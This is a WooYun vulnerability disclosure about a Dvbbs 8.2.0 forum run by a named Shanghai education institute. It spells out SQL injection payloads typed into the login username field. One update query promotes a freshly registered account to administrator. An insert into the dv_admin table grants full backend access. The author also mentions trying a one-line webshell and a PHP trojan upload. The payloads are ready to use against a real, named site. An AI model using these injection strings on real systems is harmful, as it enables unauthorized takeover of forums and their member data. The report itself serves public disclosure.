当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033847

漏洞标题:某教育集团 Dvbbs Version 8.2.0 程序漏洞(11万会员)

相关厂商:上海新世界外国语进修学院

漏洞作者: Leon

提交时间:2013-08-09 12:30

修复时间:2013-09-23 12:31

公开时间:2013-09-23 12:31

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

利用以前一个漏洞成功提权,并前后台管理,成功登录后台.

详细说明:

先在网站注册一个帐号 再退出到登录界面:用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录

E({1Q]GJ{6PR5()QSO14DFG.jpg


他会提示密码错误.
这个页面不是系统自带的貌似做了过滤,所以重新找登录界面.随便点一个没有权限浏览的贴子,他会教你输入帐号,在这个地方就可以提权.

4SCJ_E1H7~@`}`_3SN6)FWJ.jpg


用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录
这是再使用注册的帐号和密码登录进去权限就是管理员的权限

J~1(Q744S0A7LMO87C)YR6J.jpg


下来就是和后台关联了,
先退出找到刚才的登录页面.
用户名输入 elao';insert into dv_admin (username,password,flag,adduser) values ('elao','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','elao')-- (elao 为刚才注册的帐号, 中间的MD5加密的 ,替换为 自己刚才用的密码加密后的MD5)
密码输入刚才的密码 登录后也是会提示错误。

4V0ZW~(N}_@(6K}`3~DCA$D.jpg


164Z8%XOF7IE7~%~ZB]6E{I.jpg


1.jpg


URU$EH(1RCZV7$TN1VBBTA8.jpg


然后使用自己注册的帐号和密码登录 就是后台管理员了。

漏洞证明:

上面图片就证明了,一句话不执行,上传php木马可以就是执行不了。快下班了,就不弄了。

修复方案:

官方有补丁吧。还是花钱买的版本。不至于还有这个漏洞

版权声明:转载请注明来源 Leon@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝